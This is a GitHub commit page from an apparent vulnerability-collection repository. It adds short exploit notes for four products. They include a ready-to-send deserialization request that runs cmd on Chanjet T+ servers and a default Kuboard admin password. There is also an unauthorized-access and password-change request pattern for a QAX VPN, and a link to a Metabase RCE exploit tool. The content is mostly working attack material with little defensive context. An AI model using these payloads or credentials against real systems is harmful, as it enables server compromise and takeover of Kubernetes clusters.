Skip to content

Commit

Permalink
add
Browse files Browse the repository at this point in the history
  • Loading branch information
ibaiw committed Aug 14, 2023
1 parent e362917 commit 65d7561
Show file tree
Hide file tree
Showing 5 changed files with 64 additions and 0 deletions.
5 changes: 5 additions & 0 deletions Kuboard默认口令.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
漏洞描述:

Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。

admin/kuboard123
10 changes: 10 additions & 0 deletions Metabase远程代码执行漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 0x01 工具介绍

CVE-2023-38646漏洞是一种高危的Metabase远程代码执行漏洞。Metabase是一个开源的数据分析和可视化工具,可以帮助用户连接到各种数据源,并进行数据查询、分析和可视化。



# 工具链接

`https://github.com/robotmikhro/CVE-2023-38646`

5 changes: 5 additions & 0 deletions QAX-Vpn存在x遍历及任意账号密码修改漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
```
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3 cookie: admin id=1; gw admin ticket=1;
```

10 changes: 10 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,13 @@
# 8月14新增

用有畅捷通T+GetStoreWarehouseByStore RCE漏洞

QAX-Vpn存在x遍历及任意账号密码修改漏洞

Kuboard默认口令

Metabase远程代码执行漏洞



# 8月13新增
Expand Down
34 changes: 34 additions & 0 deletions 用有畅捷通T+GetStoreWarehouseByStore RCE漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
```
POST
/tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,App Code.ashx?met hod=GetstoreWarehouseByStore HTTP/1.1 Host:
User-Agent:Mozilla/5.0 (X11;Linuxx86 64)AppleWebKit/537.36(KHTML, like
Gecko)Chrome/34.0.1847.137 Safari 4E423F
Connection: close
Content-Length:668
X-Ajaxpro-Method:GetstoreWarehouseByStore
Accept-Encoding:gzip
{ "storeID":{
"type":"system.Windows.Data.objectDataProvider,
PresentationFramework,Version=4.0.0.0,Culture=neutral,
PublicKeyToken=31bf3856ad364e35",
"MethodName":"start"
"objectInstance":{
" type":"system.Diagnostics.Process,
System,Version=4.0.0.0,
Culture=neutral,
PublicKeyToken=b77a5c561934e089"
"startInfo":{
" type":"system.Diagnostics.ProcessstartInfo, system,
Version=4.0.0.0,Culture=neutral,
PublicKeyToken=b77a5c561934e089"
"FileName":"cmd",
"Arguments":"/cwhoami>
C:/Progra~2/Chanjet/TPlusStd/Website/2RUsL6jgx9sGX4GItBcVfxarBM.t
xt" } } } }
```

0 comments on commit 65d7561

Please sign in to comment.